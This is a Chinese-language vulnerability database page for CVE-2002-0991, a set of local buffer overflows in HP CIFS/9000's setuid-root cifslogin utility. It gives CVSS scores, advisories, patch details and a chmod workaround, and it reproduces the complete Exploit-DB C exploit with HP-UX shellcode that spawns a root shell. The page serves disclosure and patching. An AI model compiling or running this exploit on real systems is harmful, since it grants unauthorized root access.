CVE-2002-0991
CVSS7.2
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:29
NMCOES    

[原文]Buffer overflows in the cifslogin command for HP CIFS/9000 Client A.01.06 and earlier, based on the Sharity package, allows local users to gain root privileges via long (1) -U, (2) -D, (3) -P, (4) -S, (5) -N, or (6) -u parameters.


[CNNVD]HP CIFSLogin本地缓冲区溢出漏洞(CNNVD-200210-105)

        
        Sharity是一款运行在UNIX系统上允许用户导出共享到其他系统的程序。HP CIFS/9000系统下的Sharity工具存在漏洞。
        Sharity中的/opt/cifsclient/bin/cifslogin多个参数对用户提交的输入缺少正确边界检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        /opt/cifsclient/bin/cifslogin程序中的多个参数选项如:'-U'、'-D'、 '-P'、'-S'、'-N'和'-u'在处理用户提交的输入时缺少正确的检查,攻击者可以提交超长的数据给上述参数,当cifslogin程序执行时产生缓冲区溢出,由于cifslogin默认以suid root属性安装,精心构建提交的数据可能导致攻击者以root权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:hp:cifs-9000_server:a.01.05HP CIFS_9000 Server A.01.05
cpe:/a:hp:cifs-9000_server:a.01.06HP CIFS_9000 Server A.01.06

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0991
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0991
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-105
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5088
(VENDOR_ADVISORY)  BID  5088
http://www.iss.net/security_center/static/9431.php
(VENDOR_ADVISORY)  XF  hp-cifs-login-bo(9431)
http://archives.neohapsis.com/archives/hp/2002-q3/0016.html
(UNKNOWN)  HP  HPSBUX0207-200
http://archives.neohapsis.com/archives/bugtraq/2002-06/0300.html
(UNKNOWN)  BUGTRAQ  20020624 Sharity Cifslogin Buffer Overflow (arguments)

- 漏洞信息

HP CIFSLogin本地缓冲区溢出漏洞
高危 边界条件错误
2002-10-04 00:00:00 2005-10-20 00:00:00
本地  
        
        Sharity是一款运行在UNIX系统上允许用户导出共享到其他系统的程序。HP CIFS/9000系统下的Sharity工具存在漏洞。
        Sharity中的/opt/cifsclient/bin/cifslogin多个参数对用户提交的输入缺少正确边界检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        /opt/cifsclient/bin/cifslogin程序中的多个参数选项如:'-U'、'-D'、 '-P'、'-S'、'-N'和'-u'在处理用户提交的输入时缺少正确的检查,攻击者可以提交超长的数据给上述参数,当cifslogin程序执行时产生缓冲区溢出,由于cifslogin默认以suid root属性安装,精心构建提交的数据可能导致攻击者以root权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时去掉cifslogin程序的suid root属性。
         # chmod a-s /opt/cifsclient/bin/cifslogin
        厂商补丁:
        HP
        --
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        HP建立采用如下补丁:
        升级到A.01.06,然后为HP-UX release 11.00 或者11.11安装PHNE_24164补丁,A.01.07已经修改这个漏洞。
        补丁下载:
        HP CIFS/9000 Server A.01.06:
        HP Patch PHNE_24164
        
        http://itrc.hp.com

- 漏洞信息 (21577)

HP CIFS/9000 Server A.01.05/A.01.06 Buffer Overflow Vulnerability (EDBID:21577)
hp-ux local
2002-11-06 Verified
0 watercloud
N/A [点击下载]
source: http://www.securityfocus.com/bid/5088/info

A vulnerability has been reported in the /opt/cifsclient/bin/cifslogin utility distributed with CIFS/9000. The utility is prone to several buffer overflow conditions and may lead to root compromise.

The vulnerability occurs due to the lack of bounds checking when accepting user input for various commandline options. Specifically, the utility fails to check for excessively long arguments to the following commandline options: '-U', '-D', '-P', '-S', '-N', and '-u'.

/*
Name    : ex_cifslogin.c
Compile : cc ex_cifslogin -o cifslogin
Purpose : exploit cifslogin command for HP-UX 11.11 11.0 10.20��to get root shell
Author  : watercloud < safesuite@263.net, watercloud@xfocus.net >
Date    : 2002-11-6
Announce: Use as your own risk��
Thanks  : bear < bearundertree@163.com >
Tested  : HPUX B11.11
*/
#include<stdio.h>

#define T_LEN  2304
#define BUFF_LEN 2176
#define NOP 0x0b390280

char shellcode[]=
        "\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
        "\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
        "\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
long addr;
char buffer[T_LEN];

main()
{
        int addr_off =800 ;

        int  n=BUFF_LEN/4,i=0;
        long * ap = (long *) &buffer[BUFF_LEN];
        char * sp = &buffer[BUFF_LEN-strlen(shellcode)];
        long * np = (long *) buffer;

        addr = ((long) &addr_off + T_LEN ) & 0xffffff40 +0x40 ;

        for(i=0;i<n;np[i++]=NOP);
        memcpy(sp,shellcode,strlen(shellcode));
        for(i=0;i<(T_LEN-BUFF_LEN)/4;ap[i++]=addr+addr_off);

        printf("SP=0x%x EXP_SP=0x%x OFF=0x%x (%i)\n",(long)&addr_off & 0xffffff40,addr,addr_off);
        printf("Addr =0x%x NOP_LEN=%i\n",addr+addr_off,BUFF_LEN-strlen(shellcode));
        printf("BUFFER_LEN=%i\n",strlen(buffer));

        execl("/opt/cifsclient/bin/cifslogin","cifslogin","123",buffer,NULL);
}

		

- 漏洞信息

11362
HP CIFS/9000 cifslogin Multiple Parameter Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-06-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

HP CIFSLogin Buffer Overflow Vulnerability
Boundary Condition Error 5088
No Yes
2002-06-24 12:00:00 2009-07-11 01:56:00
Credited to Alex Hernandez <alex_hernandez@ureach.com>.

- 受影响的程序版本

HP CIFS/9000 Server A.01.06
- HP HP-UX 11.11
- HP HP-UX 11.0
HP CIFS/9000 Server A.01.05
HP CIFS/9000 Server A.01.07

- 不受影响的程序版本

HP CIFS/9000 Server A.01.07

- 漏洞讨论

A vulnerability has been reported in the /opt/cifsclient/bin/cifslogin utility distributed with CIFS/9000. The utility is prone to several buffer overflow conditions and may lead to root compromise.

The vulnerability occurs due to the lack of bounds checking when accepting user input for various commandline options. Specifically, the utility fails to check for excessively long arguments to the following commandline options: '-U', '-D', '-P', '-S', '-N', and '-u'.

- 漏洞利用

Exploit code is available:

- 解决方案

HP is aware of the vulnerability and has strongly suggested applying the following patches:
Upgrade to A.01.06, and then install patch PHNE_24164 for
HP-UX release 11.00 or 11.11.

CIFS/9000 Client version A.01.07 includes this fix.


HP CIFS/9000 Server A.01.05

HP CIFS/9000 Server A.01.06

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站